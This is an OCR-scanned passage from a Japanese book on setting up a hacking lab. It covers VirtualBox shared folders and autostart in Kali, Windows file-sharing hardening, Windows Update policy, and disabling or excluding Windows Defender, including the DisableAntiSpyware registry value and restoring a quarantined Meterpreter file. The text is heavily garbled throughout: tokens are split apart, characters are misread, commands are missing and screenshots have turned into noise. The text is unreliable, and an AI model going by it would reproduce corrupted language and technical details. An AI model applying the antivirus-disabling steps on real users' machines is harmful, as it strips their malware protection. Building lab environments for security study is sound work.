これ まで の 設定 を 適用 する と 、 次 の よう な コマ ンド に な り ま す ("8)。 


マウ ント 後 、 そ の ディ レク トリ に アク セス し て み ま す 。 








3 自動 起動 の 設定 を する 

再起 動 す る と 、 ま た mount を や り 直 す 必 要 が あり ます 。 ロ グイ ン 時 に 自動 で マ 
ウゥ ウント させ る に は 、 自 動 起 動 を 設定 し ます 。 

ここ で 簡単 に Linux の 起動 シス テム に つい て 解説 し ます 。 Linux の 起動 シス テム 
は 、 主 に SysVinit 系 と systemd 系 の 2 種類 が あり ます 。 前 者 は 古く か ら 使 われ て い 
た も の で あり 、 後 者 は 最近 の ディ スト リ ビ ュ ーション に 採用 され て きた も の で す 。 
それ ぞ れ 起動 の 方 法 が 違う の で 、 設 定 が 異な り ま す 。 

SysVinit 系 で は 、 起 動 プ ロモ セス で jnit が 起動 し ます 。 つ まり 、 init プロ セス の 中 
に 自動 起動 を 設定 し ます 。 シ ステ ム と し て 起動 時 に や ら な けれ ば な ら な いこ と 
(ネッ トワ ー ク の 初期 化 、 プ ロ セ モス の 起動 な ど ) は 、"/etc/rcd' の スク リプ ト で 定 
義 し ます 。 ホ スト 固有 の 自動 起動 の 処理 は 、"/etc/rc.local' (ある い は "/etc/rc.d/ 


8 : vboxsf が 認識 され な い 場 合 は 、Guest Additons が イン スト ー ル され て いる こと を 確認 し て く 
だ さい 。 
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rclocal") ファ イル に 書き ます (9)。 

一 方 、systemd 系 は 、SysVinit 系 の 代 堆 技術 で あり 、 最 後に imit の 代わ り に 
systemd が 起動 し ます 。 systemd 系 に な っ て も 、 シ ステ ム と し て 起動 時 に や ら な け 
れ ば な ら な いこ と は 変わ り ま せん 。 systemd は Unit と いう 単位 で 自動 起動 の 内 容 
を 管理 し ます 。 

Kali (バー ジョ ン 2018.2) に init は 存在 し ます が 、systemd へ の シン ボリ ッ ク に 
な っ て いま す 。 つ まり 、systemd 系 だ と わか り ま す 。 





自動 起動 の スク リプ ト と し て 、 次 の よう な 内 容 で "/etc/rc.local ファ イル を 作 
成 し ま す 10)。 





"/etc/rc.1oca1" フ ァイル 





ファ イル に 実行 権限 を 与え ます 。 


9 : 0S に よっ て は 、"rclocal' ファ イル に 自動 実行 の コマ ンド を 書い て も その まま で は 動き ませ 
ん 。 例 えば 、CentOS 7 は サー ビス の 起動 を systemd が 管理 する た め 、 この 現象 が 起き ます 。 そ の 
際 は 、 次 の コマ ンド で "rcllocal'" ファ イル に 実行 権限 を 与 を て お きま す 。 


usr/lib/systemd/system/rc-localservice" ファ イル に 、 「"rc.local'" ファ イル に 実行 権限 が 付与 さ 
れ て いれ ば 実行 する 」 と いう 記述 が ある た めで す 。 


*10 : 自動 起動 し た い コ マン ド が 今後 現れ た 場合 に は 、 こ の ファ イル に 追記 し ます 。 
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今回 作成 し た 自動 起動 の スク リプ ト に 対応 する Unit を 作ら な けれ ば な り ま せ 
ん 。"/etc/systemd/system/rc-localservice'" ファ イル を 作成 し ます 。 


"/etc/systemd/system/rc-1oca1 . service" フ ァイル 





最後 に サー ビス の 自動 起動 を 設定 し ます 。 





(④ わ マウ ント され た こと を 確認 する 
再起 動 後に 、 共 有 フ ォ ル ダー が マウ ント され た こと を 確認 し ます 。 
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訪 共有 フォ ル ダ ー に アフ セス で きる ユー ザー の 設定 


root 以 外 の ユー ザー で あっ て も 、"/share ディ レク トリ に は アク セス で きま す 。 
権限 が 次 の よう に な っ て いる か ら で す 。 





し か し 、"/media/sf_share' ディ レク トリ に は アク セス で きま せん 。 ユー ザー 権 
限 で は 読み 書き で き な い た めで す 。 





この フォ ル ダ ー に アク セス で きる よう に する に は 、 次 の 設定 を 行い ます 。 


① ユーザー を 追加 する 
次 の コマ ンド を 実行 し て 、 指 定 し た ユー ザー を vboxsf グ ルー プ に 追加 し ます 。 
ここ で は jpusiron と いう ユー ザー を 対象 と し て いま す 。 
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2 追加 し た ユー ザー で 共有 フォ ル ダ ー に アク セス する 
その ユー ザー に 切り 共 え て 、 共 有 フ ォ ル ダー に アク セス で きる こと を 確認 し ま 


ー 


POOt 條 ka ユ 1:< 井 Su 1DuS1PTOn 
1DuS1FOnQkKa11: /Poot 上 $ 1s /media/s† share/ 


sample .t て tx 
1DuS1FPOnQKa11 : / Poo て 上 も cat /media/s† share/ sample . モ xt 


hel1o 


湊 VirtualBox の ドラ ッ グ & ド ロッ プ 機 能 を 利用 する 
ゲス ト OS に Guest Additions を 適用 する と 、 様 々 な 機能 を 拡張 で きま す 。 そ の 1 
つと し て 、 ド ラッ グ 層 ドロ ッ プ 機能 が あり ます 。 そ の 名 の 通り 、 ホ スト OS と ゲス 


に ト に デ 


ト OS に て 、 マ ウス の 操作 の み で ファ イル の や り 取 り が で きる 機能 で す 。 


1Guest Additions が 適用 済み か 確認 する 
ゲス ト OS の Kali に Guest Additions を 適用 済み で ある こと を 確認 し ます 。 


2 ドラ ッ グ & ド ロッ プ (と コピ ー& ペ ー ス ト ) を 有効 化す る 
ゲス ト OS の Kali を 起動 し て 、 VirtualBox の メニ ュー の | デバ イス 」 > | ドラ ッ 
グ & ド ロッ プ 」| > | 双方 向 」 を 選び ます ( 図 3-10) 。 


細 3 Unux-2016.2 (6 | 実行 〒] Oracle VM yirtealBox 
ファ イル 伝 租 マシ ツ 表示 入力 | 祥 7 有 | ヘル ナガ 
光学 ドラ イブ 

オー ティ オ 

ネッ トリ ー ク 

USB 

Wecb カ メラ 


去 有 コ ォ ル ダ ー 
ワリ ッ ナ ホー ド の 共有 
ドラ ァ ッ グ &F ロ っ ブ も 
ホス ト OS か が 67 スト O の 5 へ 
ゲス メト OS か ら 秋 スト OS 
= 


Gues# Addiwons て D イメ ー ジ の 地 。. 


W) 
の 
に 1 
国 
男 
IEy 
〆 





図 3.10 ドラ ッ ク & ド ロッ プ の 有効 化 
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同様 に し て 、 ク リッ プ ボ ー ド の 共有 も で きま す 。「 デ バイ ス 」 > 「 ク リッ プ ボ ー 
ド の 共有 」 > 「 下 方 向 ] を 選び ます 。 こ れ に より 、 ホ スト OS と ゲス ト OS 間 に て 
コピ ー 層 ペー スト を 実現 で きま す 。 


③ ド ラッ グ & ド ロッ プ (と コピ ー& ペ ベー スト) が で きる こと を 確認 する 

ホス ト OS と ゲス ト OS 間 で ドラ ッ グ 層 ド ロッ プ 、 コ ピー 立 ペ ー ス ト が で きる こ 
と を 確認 し ます 。 

以上 で 仮想 マシ ン の 作業 は か な り 効 率 よ く 行 え を る よう に な っ た は ず で す 。 


プロ グラ ム を 作成 する 場合 に は 、 そ の プロ グラ ム の 実行 環境 に 適合 する 文字 
コー ド と 改行 コー ド を 指定 し な けれ ば な り ま せん 。 

例え ば 、 ホ スト OS が Windows、 ゲ スト OS が Linux で 、 互 い に フ ァイル 共有 し 
て いる 状況 を 考え ます 。 そし て 、 共有 し て いる フォ ル ダ ー 内 に Linux で 動作 させ る 
プロ グラ ム を 配置 し た と し ます 。 

Linux で 作成 し た プロ グラ ム を Windows か ら テ キス ト エ ディ ター で 開く 場合 に 
は 、 通常 は 問題 あり ませ ん 。 な ぜ な ら ば 、 Linux で 動作 する 文字 コー ド と 改行 コー 
F ド の まま に な っ て お り 、 そ れ を テキ スト エディ ター が 自動 的 に 判断 し て 、 編 集 を 
加え て も その 状態 を 保持 する か ら で す 。 

し か し 、Windows で プロ グラ ム を 新規 作成 する 場合 に は 注意 が 必要 で す 。 プロ 
グラ ム は Linux で 動作 させ る た め 、 文字 コー ド は UTF-8、 改行 コー ド は UNTIX 用 に 
し て お か な いと 、 そ の プロ グラ ム が 起動 し な か っ た り 、 Linux 側 で 編集 し よう と し 
た と き に 文字 化け し た り し ます 。 対処 法 と し て 、 テ キス ト エ ディ ター で 文字 コー 
ド な ど を 指定 し 直す か 、 nkf コ マン ド な ど で 文 字 コ ー ド だ け を 置き 換え る こと に な 
り ま す 。 

な お 、 以 上 の 議論 は 、 フ ァイル 共有 だけ で な く 、ETP な ど で フ ァイル 転送 する 
際 に も 同様 で す 。 FTP の 場合 、 改 行 コ ー ド は 自動 的 に 変更 し て くれ ます が 、 文 字 
コー ド ま で は 変更 し て くれ ませ ん 。 
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3-8 | メイ ン PC の 共有 設定 を 見 直す 





Windows 7 以降 で は 、 フ ァイル 共有 が 有効 に な っ て お り 、 デ フォ ルト で Users 
フォ ル ダ ー が 共有 され ます 。 

具体 的 に Users フォル ダー の 共有 状態 を 確認 し て み ま す 。 メ イン PC の エク スプ 
ロー ラー で CUsers フォ ル ダ ー を 右 ク リッ ク し て 、 プロ パテ ィ を 選び ます 。 プ 
ロ パ ティ 画面 が 表示 され る の で 、 | 共有 」 タプ を 選択 し ます 。 こ の フォ ル ダ ー は 共 
有 フ ォ ル ダー に な っ て いる は ず で す ( 図 3-11) 。 


ネッ トウ ー ケ て) 
fNMtSKIUP kJMUODS Jszer? 


二 者 CA 


守 忠 三吉 


1 スタ ルレ し リア フウ セ ス ミミ 中 し た し 
ー- で ネ 


] 4 プ ョ 『 
加 な 挟 語 オプ ジョ ソン ほ 計 定 し た り て でき ます 。 


| の Fac=wI ロ 





図 3-11 "C:\Users" フォ ル ダ ー の 共有 状 吉 


別 の マシ ン の エク スプ ロー ラー や コマ ンド 入力 欄 に て " 補 半 < メイ ン PC の IP ア 
ドレ ス あ る い は マシ ン 名 >" を 指定 する と 、 認 証 画面 が 表示 され ます 。 認証 に 成功 
する と 、 別 の マシ ン か ら メ イン PC の Users フ ォ ル ダー に アク セス で きま す 。 こ の 
フォ ル ダ ー に は 、 各 ユー ザー の フォ ル ダ ー が 存在 し 、 デ スク トッ プ や マイ ドキ ュ 
メン ト に アク セス で きま す 。 

これ は PC 間 で ファ イル の 受け 渡し を する に は 便利 な 機能 で す が 、 そ の 反面 、 危 
険 と ちい えま す 。 ロ ー カ ル ア カ ウン ト の パス ワリ ワード が 攻撃 者 に 知ら れ て いる 場合 、 
LAN 内 か ら 共 有 フ ォ ル ダー 内 の ファ イル に 自由 に アク セス され て し まう こと に な 
り ま す 。 特に ハッ キン グ ・ ラ ボ の ホス ト OS の 設定 と し て は 望ま し く な い の で 、 こ 
れ を 修正 し ます 。 
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共有 フォ ル ダ ー を 無効 に する 


自宅 外 に 持ち 出す よう な ノー ト PC で は 、"C:\Users"” フォ ル ダ ー の 共有 設定 を 
無効 に する と 安全 で す 。 

外部 の LAN に 参加 する 際 に は 、 パ プ ブリック ネッ トワ リー ク (公衆 無線 LAN な ど 
に 接続 し た と き に 使う ネッ トワ ー ク プロ ファ イル ) を 選択 すべ き で す 。 共有 アク 
セス を プロ ッ ク で きま す 。 し か し 、 誤 っ て ホー ムネ ットワーク や 社内 ネッ トワ リー 
ク を 選ん で し まう こと が な いと は 限り ませ ん 。 そ の た め 、 最 初 か ら 共 有 フ ォ ル 
ダー を 無効 に し て お く 方 が 安全 と いえ ます 。 


秘密 の 共有 名 を 設定 する 

どう し て も 共有 設定 を 利用 し て デー タ を や り 取 り し た い 場 合 に は 、 メ イン PC で 
は 共有 設定 を 有効 に せ ず 、 サ プ ブ PC の 方 で 共有 設定 を 有効 に し ます 。 さ ら に 、 限 定 
し た フォ ル ダ ー だ け を 共有 し ます 。 

そし て 、 共 有名 の 末尾 に 1$」 を 付け て 、 秘 密 の 共有 フォ ル ダ ー に する こと を お 
すす めし ます 。 こ の 設定 に より 、 共 有名 を 正確 に 知ら な いと 、 共 有 フ ォ ル ダー が 
表示 され な い の で 、 ア クセ ス で きま せん 。 

共有 名 を 変更 する に は 、| 詳細 な 共有 」 画面 を 表示 し て 、 [追加 ] ボタ ン か ら 、 秘 
蜜 の 共有 名 を 追加 し ます 。 そ の 人 後 、 | 詳細 な 共有 」 画面 で その 共有 名 を 選択 し ます 
( 図 3-12) 。 


ロ に も : さ -」 


レ し | この フォ ル ダ ー を 共有 有 す う 1 
全 
芸 吉 名 (H): 
Sec es 回 
造 組 (人 A) 
同 計 に 等 有 で きる ユー ザー 数 (Llk |a テ 「 
コメ ント (Oi 


ーー 





| 22 セ 2 Wa(C | 


| ck || *oer | 還 認 是 軸 





図 3-12 秘密 の 共有 名 を 設定 し た と ころ 
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上 記 の 設定 を 適用 する と 、" 半 半 <IP ア ドレ ス あ る い は コン ビュ ー タ 名 >” に アク 
セス し て 認証 が 通っ て も 、 共 有 フ ォ ル ダー が 表示 され ませ ん 。 \\ く <IP ア ドレ ス あ 
る い は コン ピュ ー タ 名 >\ く < 秘 審 の 共有 名 >" に アク セス し て 認証 が 通る こと で 、 
共有 有 フォルダー が 表示 され ます ( 図 3-13) 。 


て 5 証 | 。・ キッ ト フ ー ク ・ 192.168.1.5 。 Se 


ー フ ァイル (F) 鑑 久 (E) 租 示 (V) ツー ル T) ヘル プ (HU 
に 2 ライ ブラ リ に 追 ) * 吉 さ 以 む 閑 し い フ ォ ル ダー 
ず む Lovo_RecovwY (Q:) る 基 日 に 
過 介 | Users 2018704712 ( 木 ].… ファ イル フォ ルル 、… 
DU9e108.1.15S) Defaut 2018706/13 ( 水 ).… ファ イル フォ シレ.… 
ま Pubic (192.168.1.1) 』 DefaK USer 20187012 ( 木 ).… ファ イル フォ ルレ.… 
REACHit Dnve 』 musi 2018/06/13 ( 水 ]...。 ファ イル フォ ル ..… 
ま 3hare (192.168.1.99, Kali 2.0. 3 』 Pusiron 2018706/15 ( 任 ) ファ イル フォ ル .… 
ま Shars っ (192.168.1.1] ち バブ リック 2018/00/13 ( 水 )... プ ァ イル ブフ オル .. 


ロ 0Oesktop.ini 20180 本 12( 木 | 坦 展 居 生 
| ネッ トワ ー ク グ 
器 192.168.1.5 「 
| 無 GAROA 


7 個 の 項目 オフ ライ ン の 索 : オン ライ ン 
。 オフライン で 痢 用... 利用 不可 


7 個 の 項 中 人 ゆ イン ター ネッ ト 』 





図 3-13 秘密 の 共有 名 を 指定 し た と ころ 


最後 に 、 最 初 か ら 設 定 さ れ て いた Users と いう 共有 名 は 削除 し て お きま す 。 そう 
し な いと 、 "まま <IP ア ドレ ス あ る い は コン ピュ ー タ 名 >" に アク セス する と 、 Users 
フォ ル ダ ー が 表示 され て し まい ます 。 
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3-9 、 Windows Update を 管理 する 





Windows Update の | 更新 」 は 、 セ キュ リティ を 維持 する た め に は 必要 で す が 、 
| 目 動 更 新 」 を 適用 する こと は お すす めで きま せん 。 ユー ザー が 気付 か な いう ち に 
自動 更新 され 、 そ の 人 後 で 勝手 に 再起 動き され て し まう 恐 れ が ある た めで す 。 つ まり 、 
席 を 外し て いる 間 に 自 動 更新 され る と 、 作 業 中 の デー タ が 消え た り 、 仮 想 マ シン 
が 強制 的 に 炊 了 させ られ た り し ます 。 し か も 、 更 新 デ ー タ の 適用 に は 長 時 間 か か 
る こと が あり 、 その間 は PC の 作業 が で きま せん 。 例 えば 会 議 の プレ ゼン に 耳 も う 
と する と き に 、 勝 手 に 目 動 更新 が 走り 出し た ら 、 他 の 人 も 巻き 込ん で 迷惑 を か け 
て し まい ます 。 

Windows Update の | 自動 更新 」 は 解除 すべ きだ と わか り ま す が 、 話 は それ だ け 
で 終わ り ま せん 。 手動 で 更新 し た と し て も 、 問 題 が あり ます 。 

Windows 10 の Windows Update に は 、 字面 の 通り の | アップデート 」 だ け で な 
く 、| ア ッ プ グレ ー ド 」 も 含ま れ て いま す 。 ア ッ プ デー ト と は 、 基 本 機能 を 維持 し 
だ まま 修正 する こと を 意味 し ます 。 一 方 、 ア ッ プ グレ ー ド は 、 機 能 を 根本 的 に 差 
し 替え て し まう た め 、 イ ンタ ー フ ェ ー ス が 変わ っ て し まう こと が あり ます 。 

よっ て 、 手 動 で Windows Update を し て も 、Windows 10 の イン ター フェ ー ス が 
変わ っ て し まう こと が ある の で す 。 シ ステ ム が 大 きく 入れ 替わる の で 、 ア ッ プ グ 
レー ド に より 動作 し て いた プロ グラ ム が 動か な く な る 芝 れ が あり ます 。 実際 に 、 
Windows Update の 結果 、| Windows が 起動 し な く な っ た 」|「 プ ルー スク リー ン が 
出る ] と いっ た 不具 合 が 報告 され る こと が あり ます 。 


沙 Windows Update に 対す る 方 針 
本 書 に お ける Windows Update に 対す る 方 針 は 、 次 の よう に し ます 。 

* Windows Update の | 自動 更新 」 を 解除 する 。 

* Windows Update の 更新 デー タ が あっ た と し て も 、 適 用 する 前 に し ば らく 様子 
を 見 る 。 問題 が な さそう で あれ ば 、 手 動 で 更新 する 。 


残念 な が ら 、Windows 10 Home に は 、Windows Update の 「 自 動 更 新 」 を 解除 
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する 術 が あり ませ ん ("1)。 以降 の 説明 は 、Windows 10 Pro 以 上 の エディ ショ ン 
が 対象 と な り ま す 。 


① グ ルー プ ボリ シー エディ ター を 起動 する 
[Win] + Ir] キー で |「 フ ァイル 名 を 指定 し て 実行 」 を 開き 、"gpeditmsc と 入 
力 し て 、 グ ルー プ ポ ボ ポリシー エディ ター を 起動 し ます 。 


②)Windows Update の 設定 画面 を 開く 

「 コ ンピュータ の 構成 ] > [管理 用 テン プレ ー ト 」 > 「Windows コンポ ボ ポー ネン 
ト 」> | Windows Update」 を 選択 し ます 。 | 自動 更新 を 構成 する ] を ダブ ルク リッ 
ク し ます ( 図 3.14)。 


回 ロ - カ ル グル ー プ ポリ シー エディター 
イル (F) 筆 作 (A) 和 到 示 (WM へ 見 (H 
を ゆみ 名 加 | 委 | 四 還 | ヤ 

引 Miceoeo セカンダリ 周 壮 愛 へ 


が | Windows UPdske for Biness 
央 | [Windows リャ ッ ト ヴ ウリ] ダイ アグ ポッ プス で [更新 を イソ スト ー ル 。。 
放 概 条 仁 - ーー シャ ッ ト ダ ウン ] ダイ アロ グ ホッ クス の 既定 の オプ ショ ソ を [ー 
Wodows Dender AppDl< | Wandows XP Prefezsonsl Serce 呈 Windowz UPdste の 呈 表 震 理 を 妨 に し て 、 シメ テム の スリ ー ブ 其 -. 
> 当 Windows Dsengs Epic 還 || Pck 1、 ま た は Windows 2000 占 アウ テイ ブ 衝 間 内 の 更新 ブロ グラム の 自 稚 当 評 動 を オフ に し ます 
) 問 WindowzDwendwr Sm 当 上 や cc Pack3 以降 | 生生 再 応 重 の アウ ティ ブ 抽 司馬 を 了 定 する 
> 当 Windows Datengr ウイル: | > 第 回 更新 ログ ラム が 庄 号 製 謀 六 挟 紅 で 和 重 93 に ダウ ン ロ ー ド され る の を 
> ー Windows cp セキ ュ ル 53 な えさ re - 由 中 | スリ ジュ ー- 見 され た 時 誠に 宮 に 自動 的 に 定 超 便 す る 
> Windows iello fo usne ュ に | 更新 プロ プラ ム を イソ スト ー 史 する た の の 自動 再起 基 ⑪ 胃 随 を 得 定 する 
ーッ ト B 0 ため の イツ ダ - 屯 衝 す 
goeefer ま oo K 更 系 ログラム を イッ スト ー ル する た め の 和 生計 起 革 遂 知 を オフ に する 
ndows Modia テ ジ タル | : こ の mW リッ ー は 、 Windows RT に は 。 回 宮 新 の た め の 自 和 再 起 基 必須 起 知 を 松 成 すう 
| Windows Messenoer 透 用 3 れ ミ せん 。 内 


> こと ィ の 笠 定 で は 、 こ の コソ ビュ ー タ - で 自 約 。 国 イ ント ラ ネ ッ ト の Microzof 更 先 サ ービス の 考 所 を 店 二 すき 
Windows イソ スト ー ラ ー 更新 後生 を 有 飼 に する か どう が を 窒 回 邊 動 天 の 検出 特 度 


> 当 | Windows エー は 0 ブ ーー wa UPdse に 0 すう 2 キャン を 計る せき 戸 混 証 ポリ ッ ーー 


AI M ー I 


当 Windows カ デー ッ ス テム マ ます 。 9 
・ 医 三 = > |\ 現 天 ん 容 字 / 





図 3-14 「Windows Update」 の 項目 


3 自動 更新 を 解除 する 
完全 に 目 動 更新 を 解除 する に は 「 自 動 更 新 を 構成 する 」 画面 に て | 無効 ] に 


*11 : Windows 10 Home は 、 Windows Update の | 自動 更新 」 の 解除 だ け で な く 、 延 期 も 指定 で き 
ませ ん 。Windows Update の サー ビス を 止め て し まう と いう 手法 は 残さ れ て いま す 。 
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チェ ッ ク を 入れ ます 。 ま た 、 通 知 を 許可 する の で あれ ば | 有効 」 に チェ ッ ク を 入 
れ ま す 。 そ し て 、 オ プシ ョ ン の | 自動 更新 の 構成 ] に て 、 任 意 の 項目 を 選択 し ま 
す 。 右側 の ヘル プ の 内 容 を 参考 に 選ん で くだ さい ( 図 3.15) 。 

[2 - ダウ ン ロ ー ド と 自動 イン スト ー ル を 通知 」 を 選択 する と 、 更 新 プ ログ ラム 
を ダウ ン ロ ー ド する 前 、 お よび イン スト ー ル する 前 に 、 タ スク トレ イ に シー ルド 
アイ コン が 現れ て 通知 きれ ます 。 つ まり 、 勝 手 に これ ら が 実行 さき れ な いとい うこ 
kw の 

「3 - 自動 ダウ ン ロ ー ド し イン スト ー ル を 通知 」 を 選択 する と 、 更 新 デ ー タ は 自 
動 で ダウ ン ロ ー ド され 、 イ ンス トー ル 可 能 な 状態 で ある こと を 通知 し て くれ ます 。 
つま り 、 自 動 イ ンス トー ル は され ませ ん 。 


本 で を 奄 すう 


テー 
和 ま : この め 電 レー は Windows RT た は 通用 され ませ ん 。 
、 こ の コレ ピュ Pa 
する 必 表 


2 = 更新 プロ ケラ ム を タウ ン ロ ー「 す る 大 , お よび イン スト ー ル る 競 
に 刀 各 ずる 


生 ーーーー ン トー ラム が 医 つ か る と 、 ユー ザー 


この コン ピュ 
記 は 、 タロ ー 売ら っ ーッ ー 
Windiows U .、 使 有 可 紙 せ す べ て ① 事 新 プ ロケ ラ 
ム を タウ ン ロ ー FL エイ ンス トー ル で 9 すす 『。 





図 3-15 自動 更新 の 構成 を 有効 に し た 場合 
4, ホリ シー を 反映 させ る 
ロー カル グル ー プ ポリ シー エディ ター を 閉じ ます 。 コ マン ド プ ロン プ ト で 次 の 
コマ ンド を 入力 し て 、 ポ リ シ ー を 強制 的 に 反映 させ ます 。 


>gDupdate /force 
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10 アン チ ウ イル ス の 設定 を 見 直す 





し ミッ ーー ニーーー ム ーーー エ ニー デー ャ ーーー 和 ーー ドー 

で 実験 する 際 に は 邪魔 に みな る こと も あり ます 。 
て いる Windows Defender を 例 に 取り 上 げ ま す 。 
設定 が で きる は ず で 


ハッ キン グ ・ ラ 
ここ で は 、 Windows 10 に 備わっ 
他 の アン チ ウ イル ス で も 同様 の 


訪 リア ル タ イ ム 保 護 の 無効 化 


ファ イル を ダウ ン ロ ー ド する と 、 最 後に ウイ ルス スキ ャ ン が 実行 され ます 。 


ハッ キン グ ツ ー ル の 場合 、 ウ イル ス そ の も の で は な く て も 、 ウ イル ス に 似 し た 


プロ グラ ム と 解釈 され て し まう こと が あり ます 。 


また だ た 、 ハ ッ キ ング ツー ル を 実行 し た 場合 、 リ アル タイ ム 保 護 に よっ て プロ ッ ク 
され て し まう こと が あり ます 。 


いずれ に せよ 、 危 険 性 を 理解 し た うえ で ダウ ン ロ ー ド し た り 実 


E 行 し た り し て い 
に も か か わら ず 、 ウ イル ス と 判定 され て し まう と 


、 実 験 に 支 議 が 出 て し まい ま 
* っ た 場合 に は 、 ア ンチ ウイ ルス の リア ル タ イ ム 保 護 を 一 時 的 に 無効 に 


る 
と 2 
し ます ( 図 3-16) 。 


っ うい \ 


Wrrdons Pe た ndcr ォ キュ まれ り # 


9 ワイ ルス と 脅威 の 防止 の 設定 


Windows Defender ウイ ルス 対 曽 の ウイ ルス と 内 感想 訪 目 の 笠 下 
さす 。 


大 素 示し 、 本 交 し 


リア ル タ イ ム 保 護 


マル ワリ 1 ア を 特定 し 、 テル イス で イソ スト ー ル また は 実行 され な いよ ょ うに し ます -。 日記 約 に 
ォ オン に 硝 る 所 に 、 この 計 定 を し ば らく の 岡 オ ブ に で きま す 


人 リア ル ヲ イム 保護 が オフ に な っ て お り 、 お 使い ゆ デ バイ ス は 豚 装 な 状態 で す 。 


'@ つ ゎ 


ake 
カ う り ト の 量 新 佐 了 ー に 


サリ 了 1 叉 | に も 』 オリ 





図 3-16 リア ル タ イ ム 保 護 の 無効 化 
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た だ し 、 こ の 設定 で リア ル タ イ ム 保 護 を 無効 に し て も 、 ス ケ ジ ュ ー ル され た だ た ス 
キャ ン は 引き 続き 実行 され ます 。 


誠 検疫 か ら の 復元 


アン チ ウ イル ス で 作 威 が 検出 され る と 、 そ の ファ イル は 検疫 され ます 。 検疫 さ 
れ て し まう と 、 ア ンチ ウイ ルス 側 で 実行 を 許可 し な い 限 り 、 超 動 で きま せん 。 

Windows Defender の 場合 、 検 近 され た 後に 削除 きれ て いな けれ ば 、 次 の 手順 で 
復元 で きま す ("12)。「Windows Defender セ キュ リティ セン ター| の 「 ウ イル ス 
と 脅威 の 防止 」 で 、| 脅威 履歴 ]」 を 押し ます 。| 検疫 済み の 償 威 ]」 に 、 検 疫 履 歴 や 
ファ イル の 詳細 が 表示 され ます 。 復元 し た い フ ァイル を 選び 、[ 復 元 ] ボタ ン を 押 
し ます ( 図 3.17)。 


ndoww Dwfsmgdw すす ュ リティ で ン ッ 
* ひ スキ ャ ン の 履歴 
寺 出 され た 負 成 と スキ ヤン の 証 細 を 赤 示 し ます 。 


現在 の 脅威 
発 宇 の 育 氏 は スキ ャ ン で 検出 され た 、 換 作 を 必要 と する 項目 で す 。 


現在 の 内 臣 は あり ませ ん > 


検 投 済み の 和 威 


格 邊 済み の 大 は 、 了 上 イ ス で 実 村 され な いよ うに 誠 胡 さ れ ま し た 。 枝 疫 済み の 月 破 
は 定 基 的 に 前 除 さ れ ま す 。 


TrojarrWin32/Mceterpretergenl に 
201BIO ア に 9 


き 組 の 委 示 





図 3-17 楼 導 され た ファ イル の 復元 


涼 ウイ ルス スキ ャ ン か ら 除 外す る 
な る べく 検疫 を 避け る た め に 、 ハ ッ キ ング ツー ル を 配置 する フォ ル ダ ー を 決め 


*12 : https://docs.microsoftcom/en-us/windows/security/threat-protection/windows-deiender- 
antivirus/restore-quarantined-files-windows-defender-antivirus 
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て お き 、 そ の フォ ル ダ ー は ウイ ルス スキ ャ ン か ら 除 外す る よう に 指定 し ます 。 
Windows Defender で は 、 フ ォ ル ダー、 フ ァイル 、 プ ロ セ ス な ど を 細か く 指 定 で き 
ます ( 図 3-18)。 


Windiowrt Dclem3r せ キ ュ リ ティ ぜ ソ ター 


除外 


Windows Derender ウイ 引 ルス 討 策 り スキ ャ ソ ツ か ら 放 外 する 頃 目 を 知 加 また は 削 隊 し 
ます 。 





図 3-18 スキ ャ ン か ら の 除外 


光 Windows Defender の 無効 化 


他 の アン チ ウ イル ス を 使用 し て いる 場合 、 Windows Defender の 存在 は 邪魔 に な 
り ま す 。 二 重 に アン チ ウ イル ス が リア ル タ イ ム に 動作 し て いて は 、 重 く な っ て し 
まう だ た めで す 。 

通常 は Windows Defender を アン イン スト ー ル で きま せん が ("13)、 レ ジス トリ 
を 編集 する こと で 、Windows Defender を 無効 に で きま す ( 表 3-3)。 


*13 : Windows の プロ グラ ム の アン イン スト ー ル 画面 に は 、Windows Defender が 表示 され ませ 
ん 。 レ ジス トリ を 編集 し て 手動 で アン イン スト ー ル で きま す が 、 非 常に 手間 が か か り ま す 。 そ こ 


で 、Windows Defender Uninstaller (https://www_.raYymond.cc/blog/down 


load/did/1984/) と いう 専用 ツー ル を 使え ば 、 ボ タン 1 発 で アン イン スト ー ル で きま す 。 
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表 3-3 無効 化 の レジ スト リ 


HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows 
Defender 


値 の 名 前 DisableAntiSpyware 


ーー 
値 の デー タ 1 (無効 )、0 (有効 ) 





5 つの レジ スト リキ ー 


Windows の レジ スト リ は 、「HKEY」 か ら 始 まる 5 種類 の キー か ら 構 成 さ れ て い 
ます ( 表 33) 。 


表 3-4 5 種類 の レジ スト リキ ー 


定義 済み キー 
ユー ザー ご と の 設定 情報 を 保持 する 。 


デス クト ッ プ の 設定 な ど 、 現在 ログ オン し て いる アカ 
HKEY_CURRENT_USER HKCU | ウン ト 固 有 の シス テム や プロ グラ ム の 設定 情報 を 保 
持 す る 。 


ハー ドウ ェ ア 、 セ キュ リティ 情報 、OS、 プ ログ ラム 、 
HKEY_LOCAL_MACHINE HKLM シス テム な どの コン ピュ ー タ 固有 の 情報 を 保持 する 。 
シス テム の 起動 時 に 読み 込ま れる 重要 な 情報 が ある 。 


現在 の ハー ドウ ェ ア プ ロフ ァイル の 情報 を 保持 する 。 
"HKEY_LOCAL_MACHINE\SYSTEM\CurrentCo 
ntrolSet\Hardware Profiles\Current' の エイ リア 
スズ 。 


HKEY_CURRENT_CONFIG | HKCC 





レジ スト リエ ディ ター か ら は 参照 で きま せん が 、HKEY_PERFORMANCE_ 
DATA (HKPD) も 存在 し ます 。 こ の キー は 、 PC の パフ ォ ー マ ンス デー タ を 保持 
し レ て いま す 。 
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| 41 に NVA グ だ に か 北 づ お: 和 セ 贅 つ 





沙 AutoPlay の 悪用 

USB メ モリ ー の 目 動 実 行 (オー トラ ン ) を 吉 用 し た 攻撃 が あり ます 。USB メ モ 
リー を ター ゲッ ト に 郵 送 で 送っ た り 、 通 路 に 落と し て お いた り し ます 。 不用 意 に 
それ を PC に 挿入 し て し まう と 、 不正 プロ グラ ム が イン スト ー ル され た り 、 重 要 な 
情報 が 盗ま れ た り し ます 。 


沙 AutoPlay の 通知 の 設定 
Windows 10 で は 、USB な ど で ス トレ ー ジ を 接続 する と 、AutoPlay の 通知 が 表 
示さ れ ま す 。 そ し て 、 そ の 通知 を クリ ッ ク す る と 、 そ の デバ イス に 対す る 操 作 を 
選ぶ 目 動 再生 画面 が 表示 され ます ( 図 3-19) C14)。 


AutoPlay の 通知 


TRANSCEND (D:) 





目 動 再生 画面 


TRANSCEND (D)) 
リリ ムール ブル ドラ イブ に 対し て 行う 招 作 を 選ん で くだ さも 1。 


スト レー ジ 設 定 の 浅 成 


これ デー 


フォ ル ダ ー を 義 い て ファ イル を 表示 
スプ 逢 と 


何 も し な し ! 





